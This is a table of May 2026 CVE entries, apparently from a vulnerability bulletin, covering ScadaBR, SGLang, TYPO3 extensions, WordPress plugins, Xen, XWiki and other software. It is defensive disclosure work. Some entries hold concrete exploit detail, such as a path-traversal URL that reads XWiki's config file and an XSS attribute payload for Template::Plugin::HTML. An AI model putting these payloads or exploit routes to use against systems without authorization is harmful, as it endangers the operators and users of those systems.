| RRWO–Net::Statsd::Lite | Net::Statsd::Lite versions through 0.10.0 for Perl allowed metric injections. The values from the set_add method were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Note that version 0.9.0 fixed a similar issue CVE-2026-46719 for metric names. | 2026-05-18 | not yet calculated | CVE-2026-8788 | https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.10.1/changes https://www.cve.org/CVERecord?id=CVE-2026-46719 |
| ScadaBR–ScadaBR | In ScadaBR version 1.2.0, a Missing Authentication for Critical Function vulnerability could allow an unauthenticated attacker to send a HTTP GET requests to the SCADA system and inject arbitrary sensor readings. | 2026-05-19 | not yet calculated | CVE-2026-8602 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR–ScadaBR | In ScadaBR version 1.2.0, an OS Command Injection vulnerability could allow an attacker to execute commands as root on the SCADA system. | 2026-05-19 | not yet calculated | CVE-2026-8603 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR–ScadaBR | In ScadaBR version 1.2.0, a CSRF vulnerability could allow an attacker to trigger any authenticated action through a victim’s session by luring any logged-in user to a malicious webpage. | 2026-05-19 | not yet calculated | CVE-2026-8604 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR–ScadaBR | In ScadaBR version 1.2.0, a Use of Hard-Coded Credentials vulnerability could allow an attacker to access the SCADA system as admin. | 2026-05-19 | not yet calculated | CVE-2026-8605 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| scalar–astro v0.1.13 | scalar/astro v0.1.13 was discovered to contain an arbitrary file upload vulnerability in the the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows attackers to execute arbitrary code via uploading a crafted SVG file. | 2026-05-19 | not yet calculated | CVE-2026-30117 | https://github.com/prassan10/XSS-Open-Redirect-via-scalar_url |
| scalar–astro v0.1.13 | scalar/astro v0.1.13 was discovered to contain a Server-Side Request Forgery (SSRF) in the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows unauthenticated attackers to force the backend server to send HTTP requests to attacker-controlled URLs, leading to authentication cookies and headers exposure and possible privilege escalation. | 2026-05-19 | not yet calculated | CVE-2026-30118 | https://github.com/prassan10/ssrf-zero-click-ato-scalar |
| SGLang–SGLang | SGLangs multimodal generation runtime scheduler’s ROUTER socket binds to 0.0.0.0 by default and contains a sink that calls pickle.loads() on incoming messages, enabling RCE when exposed to the internet. | 2026-05-18 | not yet calculated | CVE-2026-7301 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| SGLang–SGLang | SGLangs multimodal generation runtime is vulnerable to an unauthenticated path traversal vulnerability, allowing an attacker to write arbitrary files anywhere the server process has write access, by including ../ sequences in the upload filename when sent to specific endpoints. | 2026-05-18 | not yet calculated | CVE-2026-7302 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| SGLang–SGLang | SGLangs multimodal generation runtime is vulnerable to unauthenticated remote code execution when the –enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation. | 2026-05-18 | not yet calculated | CVE-2026-7304 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| Siber Systems, Inc.–Android App “RoboForm Password Manager” | Android App “RoboForm Password Manager” provided by Siber Systems, Inc. handles Android intents without sufficient URL validation, user confirmation nor notification. If a URL to some malicious web page is given through an intent, RoboForm may silently download files without user confirmation nor notification. | 2026-05-20 | not yet calculated | CVE-2026-47782 | https://play.google.com/store/apps/details?id=com.siber.roboform https://www.roboform.com/news-android https://jvn.jp/en/vu/JVNVU93461473/ |
| simplesamlphp–simplesamlphp-module-casserver | SimpleSAMLphp-casserver is a CAS 1.0 and 2.0 compliant CAS server in the form of a SimpleSAMLphp module. In versions below 6.3.1 and 7.0.0, the logout endpoint accepts a url query parameter to redirect to. casserver treats that url as trusted, and either (depending on configuration) redirects the browser there, or shows a “you’ve been logged out” page with a link to continue to that url. Impacted configs include ‘enable_logout’ => true, and ‘skip_logout_page’ -> true. This issue has been resolved in versions 6.3.1 and 7.0.0. | 2026-05-18 | not yet calculated | CVE-2025-65954 | https://github.com/simplesamlphp/simplesamlphp-module-casserver/security/advisories/GHSA-cvrm-5hp6-h523 https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/0462f50f00b3bb300d83067d11b74146a57bb8e0 https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/fb6c6f1c7b9e757c93c5c306e1d36405e64f6dc5 |
| Six Apart Ltd.–Movable Type | Missing authorization vulnerability exists in Movable Type. Under certain conditions, when a user without administrator privileges signs in to the product, unintended update processing may be executed. | 2026-05-20 | not yet calculated | CVE-2026-44392 | https://movabletype.org/news/2026/05/mt-908-released.html https://www.sixapart.jp/movabletype/news/2026/05/20-1100.html https://jvn.jp/en/jp/JVN66473735/ |
| Sparx Systems–Enterprise Architect | Sparx Enterprise Architect software has a security feature that limits user’s actions to those specified in the role. An authenticated attacker can modify the Enterprise Architect client behavior (e.g. using a debugger) and log in as any other user or administrator – then it is possible to do every possible change to the repository. The vendor was notified early about this vulnerability, but didn’t respond with the details of vulnerability or vulnerable version range. Only version 17.1 and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42098 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/ea/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems–Pro Cloud Server | Sparx Pro Cloud Server is vulnerable to Broken Access Control within communication with the database. Due to lack of permission checks, any low privileged user can run arbitrary SQL queries within database user context. The vendor was notified early about this vulnerability, but didn’t respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42096 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems–Pro Cloud Server | Sparx Pro Cloud Server requires authentication based on requested URL. An attacker can omit the “model” query parameter and send the model name only in the binary blob in POST request allowing SQL query execution without authentication. The vendor was notified early about this vulnerability, but didn’t respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42097 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems–Pro Cloud Server | Sparx Pro Cloud Server is vulnerable to a Race Condition in the /data_api/dl_internal_artifact.php endpoint. The application downloads the properties of the object pointed by guid parameter and saves loaded content in current location (__DIR__) under the specified name. An attacker with repository access can control both the filename and file contents, allowing the creation of a malicious PHP file in a current directory. Although the file is deleted after processing, a race condition exists: if the response transmission is delayed (e.g., via a large file or slow client connection), the file remains accessible. During this window, the attacker can issue a second request to execute the malicious PHP file, resulting in remote code execution. The vendor was notified early about this vulnerability, but didn’t respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42099 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems–Pro Cloud Server | Improper Handling of Syntactically Invalid Structure in Sparx Pro Cloud Server allows Denial of Service (DoS) attack to be executed by sending an specially crafted SQL query. This causes the Pro Cloud Server service to terminate unexpectedly. The vendor was notified early about this vulnerability, but didn’t respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42100 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a crafted HEIF sequence file where the saiz box declares more samples than actually exist in the track’s chunk table causes a heap-buffer-overflow (out-of-bounds read) in the SampleAuxInfoReader constructor. The SampleAuxInfoReader constructor iterates over saiz->get_num_samples() samples but doesn’t validate that this count is consistent with the number of chunks in the chunks vector. When saiz declares more samples than the chunks cover, the loop increments current_chunk past chunks.size(), causing an out-of-bounds read on the chunks vector. The vulnerability is triggered during file parsing (heif_context_read_from_file) without any additional user interaction. Any application using libheif to open untrusted HEIF files is affected. This issue has been fixed in version 1.22.0. | 2026-05-22 | not yet calculated | CVE-2026-41071 | https://github.com/strukturag/libheif/security/advisories/GHSA-xj92-xjff-h8w3 https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| TCHATZI–Authen::TOTP | Authen::TOTP versions before 0.1.1 for Perl generate secrets using rand. Secrets were generated using Perl’s built-in rand function, which is predictable and unsuitable for security usage. | 2026-05-21 | not yet calculated | CVE-2026-46473 | https://metacpan.org/release/TCHATZI/Authen-TOTP-0.1.1/changes https://github.com/tchatzi/Authen-TOTP/commit/d04f30cc6538d77fc6b6d550da450cf3017b8561.patch |
| The Qt Company–Qt | An Uncontrolled Search Path Element vulnerability in the OpenSSL TLS backend of Qt Network (qtbase) in Qt Qt Framework (Unix) allows a local attacker to load a rogue CA certificate as a trusted system authority via a crafted certificate file placed in the application’s working directory. | 2026-05-19 | not yet calculated | CVE-2025-14575 | Gerrit: QSslCertificate::fromPath — reject empty path strings (Qt 6.9.2+) |
| Thermo Fisher–Scientific Torrent Suite Dx | Thermo Fisher Scientific Torrent Suite Dx through 5.14.2 has a privilege escalation vulnerability that may allow an authenticated user with limited access privileges to gain unauthorized administrator-level privileges through exploitation of specific system interfaces. | 2026-05-18 | not yet calculated | CVE-2026-41085 | https://thermofisher.com https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/TorrentSuiteDxSoftware_v5_14_2.pdf |
| tinyMQTT–tinyMQTT | In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), the broker mishandles protocol violations during CONNECT packet parsing. When receiving a CONNECT packet with a zero-length Client ID while CleanSession is set to 0, the broker correctly replies with a CONNACK return code 0x02 (Identifier Rejected) but fails to explicitly close the TCP connection. Since the surrounding connection teardown logic is not guaranteed to execute, each such invalid CONNECT attempt leaves the underlying socket open. Repeated attempts cause server-side resource exhaustion due to accumulating file descriptors and memory usage, potentially resulting in denial of service. | 2026-05-18 | not yet calculated | CVE-2025-56352 | https://github.com/JustDoIt0910/tinyMQTT/issues/19 |
| TODDR–Template::Plugin::HTML | Template::Plugin::HTML versions through 3.102 for Perl allows HTML and JavaScript to be injected. The html_filter function did not escape single quotes. HTML attributes inside of single quotes could be have code injected. For example, the variable “var” in <a id=’ref’ title='[% var | html %]’> would not be properly escaped. An attacker could insert some limited HTML and JavaScript, for example, var = ” ‘ onclick=’while (true) { alert(1) }’” Note that arbitrary HTML and JavaScript would be difficult to inject, because angle brackets, ampersands and double-quotes would still be escaped. | 2026-05-19 | not yet calculated | CVE-2026-5090 | https://github.com/abw/Template2/issues/327 https://github.com/abw/Template2/pull/337/changes/11c78a7a771d4af505efeb754a0b8775689c2eae |
| TP-Link Systems Inc.–Archer AX72 (SG) v1.0 | In the web management interface of Archer AX72 (SG) v1, the network diagnostic feature improperly handles invalid user input, resulting in limited exposure of diagnostic command usage information. An authenticated attacker with administrative privileges could exploit this issue to confirm the presence of the diagnostic utility and view its valid command-line syntax and options. The exposed information is limited in scope and does not include sensitive system data. | 2026-05-19 | not yet calculated | CVE-2026-5511 | https://www.tp-link.com/sg/support/download/archer-ax72/#Firmware https://www.tp-link.com/us/support/faq/5096/ |
| TP-Link Systems Inc.–Archer RE650 v1 | An authentication logic vulnerability in multiple TP-Link range extenders allows an unauthenticated attacker on an adjacent network to manipulate a login parameter and reset the administrator password due to insufficient validation. Successful exploitation allows an attacker to obtain full administrative control of the affected device, potentially impacting on confidentiality, integrity, and availability. | 2026-05-22 | not yet calculated | CVE-2026-3294 | https://www.tp-link.com/en/support/download/re650/v1/#Firmware https://www.tp-link.com/us/support/download/re650/v1/#Firmware https://www.tp-link.com/us/support/download/re305/v1/#Firmware https://www.tp-link.com/en/support/download/re305/v1/#Firmware https://www.tp-link.com/us/support/download/re360/v1/#Firmware https://www.tp-link.com/en/support/download/re360/v1/#Firmware https://www.tp-link.com/us/support/download/tl-wa860re/v4/#Firmware https://www.tp-link.com/en/support/download/tl-wa860re/v4/#Firmware https://www.tp-link.com/en/support/download/re580d/#Firmware https://www.tp-link.com/us/support/download/re580d/#Firmware https://www.tp-link.com/us/support/faq/5101/ |
| Trend Micro, Inc.–TrendAI Apex One (Mac) | An origin validation error vulnerability in the Trend Micro Apex One (mac) agent iCore service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71214 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-139/ |
| Trend Micro, Inc.–TrendAI Apex One (Mac) | A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent iCore service signature verification could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71215 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-141/ |
| Trend Micro, Inc.–TrendAI Apex One (Mac) | A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent cache mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71216 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-142/ |
| Trend Micro, Inc.–TrendAI Apex One (Mac) | An origin validation error vulnerability in the Trend Micro Apex One (mac) agent self-protection mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71217 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-143/ |
| Trimble–SketchUp | A cross-site scripting (XSS) vulnerability in SketchUp 2026’s Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser. | 2026-05-22 | not yet calculated | CVE-2026-9264 | https://trust.trimble.com/?tcuUid=52252bc0-c196-4b1f-9f13-4e4c9ba247d9 |
| TYPO3–Extension “Address List” | The AddressRepository::getSqlQuery() method constructs a database query without properly sanitizing user input, leading to SQL Injection. The method is not invoked anywhere within the extension itself and therefore poses no direct risk in a default installation. However, custom extensions that call this method with untrusted input would expose the site to SQL injection. | 2026-05-19 | not yet calculated | CVE-2026-8827 | https://typo3.org/security/advisory/typo3-ext-sa-2026-012 |
| TYPO3–Extension “Content Element Selector” | The extension passes an attacker-controlled cookie directly to PHP’s unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with “Persistent Mode: Static” in the plugin settings. | 2026-05-19 | not yet calculated | CVE-2026-46725 | https://typo3.org/security/advisory/typo3-ext-sa-2026-013 |
| TYPO3–Extension “Faceted Search” | The OOXML parsing of the file indexer does not disable external entity resolution. A crafted xlsx or pptx document placed in an indexed directory can cause local files to be read or outbound HTTP requests to be performed, with the retrieved content being written to the search index. | 2026-05-19 | not yet calculated | CVE-2026-46722 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3–Extension “Faceted Search” | The additional_tables configuration of the page and tt_content indexers accepts arbitrary table and field names. A backend user with permission to edit indexer configurations can copy sensitive data from internal TYPO3 tables into the search index. | 2026-05-19 | not yet calculated | CVE-2026-46723 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3–Extension “Faceted Search” | The file indexer does not normalize the configured directory path. A backend user with permission to edit indexer configurations can index documents from arbitrary locations on the server file system through path traversal sequences. | 2026-05-19 | not yet calculated | CVE-2026-46724 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3–Extension “Frontend User Registration” | The create and edit flows do not restrict which user properties may be submitted and do not enforce access control on the frontend user group assignment. As a result, an attacker can assign an arbitrary frontend user group to a newly registered or edited account, gaining unauthorized access to content and functionality restricted to privileged frontend user groups. | 2026-05-19 | not yet calculated | CVE-2026-46721 | https://typo3.org/security/advisory/typo3-ext-sa-2026-009 |
| TYPO3–Extension “News system” | The extension fails to properly sanitize user input before using it in a database query. As a result, an unauthenticated attacker can inject arbitrary SQL through a URL parameter on pages using the “Date Menu of news articles” plugin. Exploitation requires the “Date Menu of news articles” plugin to be in use and the TypoScript/Plugin setting disableOverrideDemand not to be enabled. | 2026-05-19 | not yet calculated | CVE-2026-8726 | https://typo3.org/security/advisory/typo3-ext-sa-2026-010 |
| TYPO3–Extension “Site Crawler” | The Crawler extension passes the X-T3Crawler-Meta response header from crawled URLs directly to PHP’s unserialize(). An attacker controlling a crawled endpoint can inject arbitrary serialized PHP objects, leading to Remote Code Execution on the TYPO3 server. Exploitation requires administrative privileges to configure a crawler-enabled page and trigger the crawl via a Scheduler task. | 2026-05-19 | not yet calculated | CVE-2026-8727 | https://typo3.org/security/advisory/typo3-ext-sa-2026-008 |
| Unknown–Ajax Load More | The Ajax Load More WordPress plugin before 7.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2026-05-18 | not yet calculated | CVE-2026-6495 | https://wpscan.com/vulnerability/c52f28c5-547d-48ae-89dd-edcdaeadcec5/ |
| Unknown–Autoptimize | The Autoptimize WordPress plugin before 3.1.15, Clearfy Cache WordPress plugin before 2.4.2, Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a predictable replacement hash used during the HTML minification process and abusing a regular expression. This allows an attacker to inject arbitrary HTML attributes in the final HTML output by anticipating the placeholder format. | 2026-05-18 | not yet calculated | CVE-2026-3220 | https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/ |
| Unknown–Decent Comments | The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses. | 2026-05-20 | not yet calculated | CVE-2026-7385 | https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/ |
| Unknown–Email Encoder | The Email Encoder WordPress plugin before 2.4.7 does not escape email addresses retrieved via user input, allowing unauthenticated attackers to perform Stored XSS attacks | 2026-05-20 | not yet calculated | CVE-2026-5776 | https://wpscan.com/vulnerability/00c0b9f7-c559-463e-80ae-97d99e0ef99f/ |
| Unknown–Feeds for YouTube (YouTube video, channel, and gallery plugin) | The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of the Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4’s license key due to a missing capability check on the ‘actions’ function. This makes it possible for subscribers and above delete the license key. | 2026-05-18 | not yet calculated | CVE-2026-1631 | https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/ |
| Unknown–Fortis for WooCommerce | The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis’ API and retrieve sensitive customer information, like past orders, PII, etc. | 2026-05-19 | not yet calculated | CVE-2025-15609 | https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/ |
| Unknown–WP Maps | The WP Maps WordPress plugin before 4.9.3 does not properly sanitize a parameter before using it in a file path, allowing authenticated users to perform Local File Inclusion attacks. | 2026-05-18 | not yet calculated | CVE-2026-6381 | https://wpscan.com/vulnerability/18b36672-58d7-44fa-b653-b728e9ef257a/ |
| Unknown–WP Photo Album Plus | The WP Photo Album Plus WordPress plugin before 9.1.11.001 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks. | 2026-05-18 | not yet calculated | CVE-2026-6379 | https://wpscan.com/vulnerability/60b88fd2-4048-4773-b319-63caaf5bd8eb/ |
| vaadin–flow | A possible information disclosure vulnerability exists in the Vaadin Maven plugin and Vaadin Gradle plugin that exposes the full set of environment variables in build logs whenever the frontend build process exits with a non-zero status. Because the build environment may contain credentials supplied as secrets, any failed frontend build can expose those secrets in clear text in CI logs and archived build artifacts. Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include: Product version Vaadin 23.0.0 – 23.6.9 Vaadin 24.0.0 – 24.9.16 Vaadin 24.10.0 – 24.10.3 Vaadin 25.0.0 – 25.0.10 Vaadin 25.1.0 – 25.1.4 Mitigation Upgrade to 23.6.10 Upgrade to 24.9.17 or newer Upgrade to 24.10.4 or newer Upgrade to 25.0.11 or newer Upgrade to 25.1.5 or newer Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, or 25 version. ArtifactsMaven coordinatesVulnerable versionsFixed versioncom.vaadin:flow-plugin-base23.0.0 – 23.6.10≥23.6.11com.vaadin:flow-plugin-base24.0.0 – 24.9.17≥24.9.18com.vaadin:flow-plugin-base24.10.0 – 24.10.3≥24.10.4com.vaadin:flow-plugin-base25.0.0 – 25.0.11≥25.0.12com.vaadin:flow-plugin-base25.1.0 – 25.1.4≥25.1.5com.vaadin:flow-maven-plugin23.0.0 – 23.6.10≥23.6.11com.vaadin:flow-maven-plugin24.0.0 – 24.9.17≥24.9.18com.vaadin:flow-maven-plugin24.10.0 – 24.10.3≥24.10.4com.vaadin:flow-maven-plugin25.0.0 – 25.0.11≥25.0.12com.vaadin:flow-maven-plugin25.1.0 – 25.1.4≥25.1.5com.vaadin:flow-gradle-plugin24.0.0 – 24.9.17≥24.9.18com.vaadin:flow-gradle-plugin24.10.0 – 24.10.3≥24.10.4com.vaadin:flow-gradle-plugin25.0.0 – 25.0.11≥25.0.12com.vaadin:flow-gradle-plugin25.1.0 – 25.1.4≥25.1.5 | 2026-05-19 | not yet calculated | CVE-2026-7860 | https://vaadin.com/security/cve-2026-7860 https://github.com/vaadin/flow/pull/24219 |
| vifm–vifm | vifm is vulnerable to a heap buffer overflow during the history merge process when saving the state file (vifminfo.json). This flaw occurs because the application lacks a runtime check on the length of history entries in release builds, potentially allowing a crafted long path or command in the history to cause memory corruption or application crashes. Releases from 0.12.1 to 0.14.3 (including) are considered vulnerable. This issue was fixed in commit 23063c7 | 2026-05-22 | not yet calculated | CVE-2026-8997 | https://cert.pl/en/posts/2026/05/CVE-2026-8997 https://github.com/vifm/vifm/commit/23063c741f15a85621fd232dfc3ac5b779f6910d |
| WineHQ–Wine | Wine ships a .desktop file that registers itself as a MIME handler for EXE files and several other Windows executable file types. In some configurations, handling of an EXE file causes that file to be blindly executed with the permissions of the invoker. This allows escaping Flatpak and Snap sandboxes, because MIME handlers are not intended for use by code interpreters and loaders. NOTE: some parties feel that this is not a bug to be addressed in Wine, because there is no known solution that avoids a severe loss of usability (Wine could be a binfmt-misc handler, but binfmt-misc does not exist on all platforms supported by Wine). | 2026-05-24 | not yet calculated | CVE-2026-48831 | https://bugs.winehq.org/show_bug.cgi?id=59767 https://www.openwall.com/lists/oss-security/2026/05/19/1 |
| Xen–Xen | Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES command within a transaction due to an assert() triggering. In case xenstored was built with NDEBUG #defined nothing bad will happen, as assert() is doing nothing in this case. Note that the default is not to define NDEBUG for xenstored builds even in release builds of Xen. | 2026-05-19 | not yet calculated | CVE-2026-23557 | https://xenbits.xenproject.org/xsa/advisory-484.html |
| Xen–Xen | The adjustments made for XSA-379 as well as those subsequently becoming XSA-387 still left a race window, when a HVM or PVH guest does a grant table version change from v2 to v1 in parallel with mapping the status page(s) via XENMEM_add_to_physmap. Some of the status pages may then be freed while mappings of them would still be inserted into the guest’s secondary (P2M) page tables. | 2026-05-19 | not yet calculated | CVE-2026-23558 | https://xenbits.xenproject.org/xsa/advisory-486.html |
| xwiki–xwiki-commons | XWiki Platform is a generic wiki platform. Versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17 allow access to read configuration files by using URLs such as http://localhost:8080/bin/ssx/Main/WebHome?resource=/../../WEB-INF/xwiki.cfg&minify=false, leading to Path Traversal. The vulnerability is can be exploited via resources parameter the ssx and jsx endpoints by using leading slashes. This issue has been patched in 18.1.0-rc-1, 17.10.3, 17.4.9, 16.10.17. | 2026-05-20 | not yet calculated | CVE-2026-23734 | https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-xq3r-2qv5-vqqm https://github.com/xwiki/xwiki-commons/commit/a979cafd89f6a9c9c0b9ab19744d672df64429bf https://jira.xwiki.org/browse/XCOMMONS-3547 |
| xwiki–xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki Platform is a generic wiki platform. In versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17, the POST /wikis/{wikiName} API executes a XAR import without performing any authentication or authorization checks, allowing an unauthenticated attacker to create or update documents in the target wiki. This vulnerability has been patched in XWiki 16.10.17, 17.4.9, 17.10.3, 18.0.1 and 18.1.0-rc-1. | 2026-05-20 | not yet calculated | CVE-2026-33137 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qrvh-r3f2-9h4r https://github.com/xwiki/xwiki-platform/commit/4b7b95b79256374d487e9ece1dc48f527966990f https://jira.xwiki.org/browse/XWIKI-23953 |
| Zenshin–hitarth-gg | An OS command injection vulnerability in the /stream-to-vlc Express route in hitarth-gg Zenshin before 2.7.0 allows remote attackers to execute arbitrary commands via the url parameter. | 2026-05-19 | not yet calculated | CVE-2026-37281 | https://github.com/hitarth-gg/zenshin https://github.com/hitarth-gg/zenshin/commit/7d31c6edfbac978f0ad44c66d761bab9dcd2fa27 https://gist.github.com/MitruStefan/cf016709252aabbec7f95b7a70e0cfba |
| zephyrproject-rtos–Zephyr | A bitwise shift vulnerability in Zephyr’s PTP subsystem allows a remote attacker to cause undefined behavior and potential system crashes. An attacker sends a crafted PTP_MSG_MANAGEMENT message to set an unvalidated negative log_announce_interval value in the port’s data set. When a subsequent PTP_MSG_ANNOUNCE message is processed, port_timer_set_timeout_random computes a timeout as NSEC_PER_SEC >> -log_seconds; if the attacker-supplied value is sufficiently negative (e.g., -127), the shift amount exceeds the 64-bit integer width, triggering undefined behavior in C. This can cause a system crash via a compiler-generated illegal instruction trap on some architectures, or produce an erroneous zero timeout leading to resource starvation loops or other logical errors. | 2026-05-22 | not yet calculated | CVE-2026-5072 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3v98-458v-388r |
| LalanaChami–Pharmacy Management System | API endpoints in LalanaChami Pharmacy Management System (commit 5c3d028) lack authentication middleware. Unauthenticated remote attackers can exploit this to dump all user records (including bcrypt password hashes) via /api/user/getUserData, modify drug inventory, and access private medical prescription data via /api/doctorOder. | 2026-05-19 | not yet calculated | CVE-2026-31071 | https://github.com/LalanaChami/Pharmacy-Mangment-System/tree/5c3d02888631166649856f71d542387114b3010b/backend/routes https://gist.github.com/nedlir/bc8ad4693c53256819280e8f5de49286 |
| Panabit–PAP-XM320 | A command injection vulnerability exists in Panabit PAP-XM320 up to and including V7.7. The web management interface invokes the backend helper /usr/sbin/pappiw and passes user-controlled parameters to it. The helper performs unsafe argument processing using eval, which allows command injection when attacker-controlled input is included in the arguments. As a result, an authenticated remote attacker with access to the management interface may execute arbitrary shell commands. | 2026-05-19 | not yet calculated | CVE-2026-36827 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36827-3652c0ab46158036a888ef4a12b104bf |
| Panabit–PAP-XM320 | A command injection vulnerability exists in the /cgi-bin/tools/ajax_cmd endpoint of Panabit PAP-XM320 up to and including v7.7. The CGI component allows authenticated users to execute arbitrary shell commands with root privileges via the action=runcmd parameter. | 2026-05-19 | not yet calculated | CVE-2026-36828 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36828-3652c0ab461580f28f50ddc37ce4e1d6 |
